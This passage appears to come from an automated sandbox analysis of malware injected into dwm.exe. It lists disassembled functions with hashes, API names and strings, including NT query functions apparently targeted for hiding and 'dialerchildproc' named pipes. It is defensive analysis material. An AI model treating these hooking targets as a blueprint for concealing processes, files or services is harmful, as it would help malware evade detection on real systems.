call 1d15b0585c0 657->660 658->657 660->645
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                    • API String ID: 2119608203-3850299575
                                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction ID: d6eb5d11205c8ff579a557355645726895c692e92750abd907171e70f67a2328
                                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction Fuzzy Hash: 9DB18072210A50B2EB598FA5E6407E963B5FB86B84F145217DE0A53BD5EF38CC80CB40
                                                                    Function 000001D15B057D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3140674995-0
                                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction ID: 166b74c58df0480c742262e208ef69e5dcb0f39bcb00e6a54bfe8170d320d707
                                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction Fuzzy Hash: F3313B72205B80AAEB609FA0F8907ED7374F786744F44452ADA4E57B98EF3CC648CB10
                                                                    Function 000001D15B05D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction ID: 91cee1b51a5b39d856704e4d174ecbcfdf22eb2d770e899cc0d1f04db19a8404
                                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction Fuzzy Hash: F3314C32214B80A6DB609F65E9817EE73B4F7CA794F500226EA9D43B94DF3CC556CB00
                                                                    Function 000001D15B0512BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                    • String ID: d
                                                                    • API String ID: 2005889112-2564639436
                                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction ID: c96a7a718f4b285f698c519ddf9aecd0f938f7f332536690a7c5e347f0db06fa
                                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction Fuzzy Hash: D7513D36604B84A6EB54CFA2F6443DA77B1F7CAB95F144225DA4947B68EF3CC045CB40
                                                                    Function 000001D15B051D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                    • API String ID: 4175298099-1975688563
                                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction ID: 7fe5af55d7f1992d7dca8ff50263833b7771605b0945004fbd84b1f7652575cd
                                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction Fuzzy Hash: EC31827421095AB0FA04EFE6FF567D46331BBD7384FA057139409169A6AF3C8A4ACF50
                                                                    Function 000001D15B016910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 415 1d15b016910-1d15b016916 416 1d15b016951-1d15b01695b 415->416 417 1d15b016918-1d15b01691b 415->417 420 1d15b016a78-1d15b016a8d 416->420 418 1d15b016945-1d15b016984 call 1d15b016fc0 417->418 419 1d15b01691d-1d15b016920 417->419 435 1d15b016a52 418->435 436 1d15b01698a-1d15b01699f call 1d15b016e54 418->436 421 1d15b016922-1d15b016925 419->421 422 1d15b016938 __scrt_dllmain_crt_thread_attach 419->422 423 1d15b016a9c-1d15b016ab6 call 1d15b016e54 420->423 424 1d15b016a8f 420->424 426 1d15b016931-1d15b016936 call 1d15b016f04 421->426 427 1d15b016927-1d15b016930 421->427 430 1d15b01693d-1d15b016944 422->430 438 1d15b016ab8-1d15b016aed call 1d15b016f7c call 1d15b016e1c call 1d15b017318 call 1d15b017130 call 1d15b017154 call 1d15b016fac 423->438 439 1d15b016aef-1d15b016b20 call 1d15b017190 423->439 428 1d15b016a91-1d15b016a9b 424->428 426->430 440 1d15b016a54-1d15b016a69 435->440 447 1d15b0169a5-1d15b0169b6 call 1d15b016ec4 436->447 448 1d15b016a6a-1d15b016a77 call 1d15b017190 436->448 438->428 449 1d15b016b22-1d15b016b28 439->449 450 1d15b016b31-1d15b016b37 439->450 467 1d15b0169b8-1d15b0169dc call 1d15b0172dc call 1d15b016e0c call 1d15b016e38 call 1d15b01ac0c 447->467 468 1d15b016a07-1d15b016a11 call 1d15b017130 447->468 448->420 449->450 454 1d15b016b2a-1d15b016b2c 449->454 455 1d15b016b39-1d15b016b43 450->455 456 1d15b016b7e-1d15b016b94 call 1d15b01268c 450->456 461 1d15b016c1f-1d15b016c2c 454->461 462 1d15b016b45-1d15b016b4d 455->462 463 1d15b016b4f-1d15b016b5d call 1d15b025780 455->463 476 1d15b016b96-1d15b016b98 456->476 477 1d15b016bcc-1d15b016bce 456->477 470 1d15b016b63-1d15b016b78 call 1d15b016910 462->470 463->470 480 1d15b016c15-1d15b016c1d 463->480 467->468 518 1d15b0169de-1d15b0169e5 __scrt_dllmain_after_initialize_c 467->518 468->435 488 1d15b016a13-1d15b016a1f call 1d15b017180 468->488 470->456 470->480 476->477 485 1d15b016b9a-1d15b016bbc call 1d15b01268c call 1d15b016a78 476->485 478 1d15b016bd5-1d15b016bea call 1d15b016910 477->478 479 1d15b016bd0-1d15b016bd3 477->479 478->480 497 1d15b016bec-1d15b016bf6 478->497 479->478 479->480 480->461 485->477 512 1d15b016bbe-1d15b016bc6 call 1d15b025780 485->512 505 1d15b016a21-1d15b016a2b call 1d15b017098 488->505 506 1d15b016a45-1d15b016a50 488->506 502 1d15b016c01-1d15b016c11 call 1d15b025780 497->502 503 1d15b016bf8-1d15b016bff 497->503 502->480 503->480 505->506 517 1d15b016a2d-1d15b016a3b 505->517 506->440 512->477 517->506 518->468 519 1d15b0169e7-1d15b016a04 call 1d15b01abc8 518->519 519->468
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                    • API String ID: 190073905-1786718095
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 0f92f31a59dc00eaf722c44483f8f73cd2cc03c828f1b8628713d74c64339858
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 9481AE71701241B6FA58ABE5FE413EA62B1BBC7780F588727AA0547796EF3DC8458F00
                                                                    Function 000001D15B05CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 000001D15B05CE37
                                                                    • FlsGetValue.KERNEL32(?,?,?,000001D15B060A6B,?,?,?,000001D15B06045C,?,?,?,000001D15B05C84F), ref: 000001D15B05CE4C
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001D15B060A6B,?,?,?,000001D15B06045C,?,?,?,000001D15B05C84F), ref: 000001D15B05CE6D
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001D15B060A6B,?,?,?,000001D15B06045C,?,?,?,000001D15B05C84F), ref: 000001D15B05CE9A
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001D15B060A6B,?,?,?,000001D15B06045C,?,?,?,000001D15B05C84F), ref: 000001D15B05CEAB
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001D15B060A6B,?,?,?,000001D15B06045C,?,?,?,000001D15B05C84F), ref: 000001D15B05CEBC
                                                                    • SetLastError.KERNEL32 ref: 000001D15B05CED7
                                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B060A6B,?,?,?,000001D15B06045C,?,?,?,000001D15B05C84F), ref: 000001D15B05CF0D
                                                                    • FlsSetValue.KERNEL32(?,?,00000001,000001D15B05ECCC,?,?,?,?,000001D15B05BF9F,?,?,?,?,?,000001D15B057AB0), ref: 000001D15B05CF2C
                                                                      • Part of subcall function 000001D15B05D6CC: HeapAlloc.KERNEL32 ref: 000001D15B05D721
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B060A6B,?,?,?,000001D15B06045C,?,?,?,000001D15B05C84F), ref: 000001D15B05CF54
                                                                      • Part of subcall function 000001D15B05D744: HeapFree.KERNEL32 ref: 000001D15B05D75A
                                                                      • Part of subcall function 000001D15B05D744: GetLastError.KERNEL32 ref: 000001D15B05D764
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B060A6B,?,?,?,000001D15B06045C,?,?,?,000001D15B05C84F), ref: 000001D15B05CF65
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B060A6B,?,?,?,000001D15B06045C,?,?,?,000001D15B05C84F), ref: 000001D15B05CF76
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 570795689-0
                                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction ID: b3ad19021429202aca9d8f687e68461130d53c360a874fb2a6e00981273983ef
                                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction Fuzzy Hash: E0417D3020264475FA78A7F17B563E962B67BC77B0F244727A93706EE6EE6CC4518E00
                                                                    Function 000001D15B052244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                    • API String ID: 2171963597-1373409510
                                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction ID: d22cbe454d27222ba32fd17ad4452946519b4d685ae4a84a2c93603e9800e246
                                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction Fuzzy Hash: 03213D32614650A2FB108F65F64439A73B0F7CABA4F600316EA5902AA8DF3CC149CF00
                                                                    Function 000001D15B019944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457136320.000001D15B010000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B010000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b010000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction ID: b53b4730d465f63d2a7def7e89c16d69a2edfaff4366ff9ac57791692d03caa6
                                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction Fuzzy Hash: 35E18172605740BAEF68DFA5EA803DD77B4F786B98F500216EE8957B55CB38C192CB00
                                                                    Function 000001D15B05A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction ID: c2966b244c91387b86f4ee71bd5712465287522a86d06725f8c10a983de27fde
                                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction Fuzzy Hash: ABE16B72604B50AAEB209FA5A6803ED7BF0F786798F101616EE8957F95CB38D581CF00
                                                                    Function 000001D15B05F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3013587201-537541572
                                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction ID: e3b97a724a0c26b647ccb6e373b026aa595d47d4d51ccea169569e405195ee25
                                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction Fuzzy Hash: CC41A132311A00B1FB16CB96BA547DA63B5B7C6BA0F59432B9D0A87BC4EF3CD4458B50
                                                                    Function 000001D15B05104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                    • String ID: d
                                                                    • API String ID: 3743429067-2564639436
                                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction ID: 44afd042e49ab65951f41e6b610310bbee1131a53f61888b396ffb9ad00e8565
                                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction Fuzzy Hash: 50416033214B84E6E760CF61E54439A77B1F389B98F14822ADA8947B58EF3CC445CB40
                                                                    Function 000001D15B05D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FlsGetValue.KERNEL32(?,?,?,000001D15B05C7DE,?,?,?,?,?,?,?,?,000001D15B05CF9D,?,?,00000001), ref: 000001D15B05D087
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001D15B05C7DE,?,?,?,?,?,?,?,?,000001D15B05CF9D,?,?,00000001), ref: 000001D15B05D0A6
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001D15B05C7DE,?,?,?,?,?,?,?,?,000001D15B05CF9D,?,?,00000001), ref: 000001D15B05D0CE
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001D15B05C7DE,?,?,?,?,?,?,?,?,000001D15B05CF9D,?,?,00000001), ref: 000001D15B05D0DF
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001D15B05C7DE,?,?,?,?,?,?,?,?,000001D15B05CF9D,?,?,00000001), ref: 000001D15B05D0F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: 1%$Y%
                                                                    • API String ID: 3702945584-1395475152
                                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction ID: 41f9ce6d9ddd2d6c1010ab8f520e8c2d84c71fe11114ae84875650061be5add4
                                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction Fuzzy Hash: FA118E3070064471FA68A7E57B577E962657BC63F0F245327A93A46EEAEE6CC4438E00
                                                                    Function 000001D15B057510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 190073905-0
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 649a3a510a17e257c2683002df8c526a2f7044ccebf7fe0ebf0c35d86368e9bc
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 1081C270600601BAFA54ABE5B6C13F962B4BBC7780F548717AA4547BD6DB7CC845EF00
                                                                    Function 000001D15B059DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction ID: 9f23059ca0a2315b9bb008316f1aabcda0a3a3bc3a2245b132ec215b988e5649
                                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction Fuzzy Hash: 06318331212A40F1EE21DB82BA447E562B4B7CABA0F5907269D1E4BBD1EF3DC4858F10
                                                                    Function 000001D15B063DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                    • String ID: CONOUT$
                                                                    • API String ID: 3230265001-3130406586
                                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction ID: 4b5f6ea545711fcc5774dc64413d02da4f88c60f4c10ec18ace9a0d11dbb7d2b
                                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction Fuzzy Hash: 26115E31714A40A6E7508F96FA44399B6B0F7CAFE4F244326EA5A877A4CF7CC4148B84
                                                                    Function 000001D15B052F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID: dialer
                                                                    • API String ID: 756756679-3528709123
                                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction ID: 97f997c12409b34ceb798f425df53f1968643669e46be52c980ecc3634201710
                                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction Fuzzy Hash: 87319032701B51B2EA14CF96FA407A977B0FB86B80F0842329E4947B95EF3CC4618B00
                                                                    Function 000001D15B05CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction ID: 83e5c73e7e11c21f5551f56a6c2f95734b0ea222993be1e68b691b63c647228c
                                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction Fuzzy Hash: BD116D3020164471FA64A7A1BB567E962767BC67B0F245727A93647FE6EE6CC4028F00
                                                                    Function 000001D15B05199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                    • String ID:
                                                                    • API String ID: 517849248-0
                                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction ID: 9744b8122b6b2a523495e4084416549d3db7e6c7e882648d228f8de3728d1ece
                                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction Fuzzy Hash: E9015B31300A40B2EA10DF92B5583D963B5FB89BC4F684136DE4943B64DF3CC549CB40
                                                                    Function 000001D15B0536C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                    • String ID:
                                                                    • API String ID: 449555515-0
                                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction ID: bfa79d6b72dc2b03214b0c71d68d76599a302ce302c4d8f5de8811166a35e48a
                                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction Fuzzy Hash: 83016D74611B44B2FB249FA1F90879673B0FB86B82F140626CD4A077A4EF3CC5488F00
                                                                    Function 000001D15B058FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000040.00000002.3457186865.000001D15B050000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_64_2_1d15b050000_dwm.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                    • Instruction ID: 1714aae6391ef2520bf3eb5c026a672653fab9e9ba367d85b2ba2b3ab2f01910
                                                                    • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
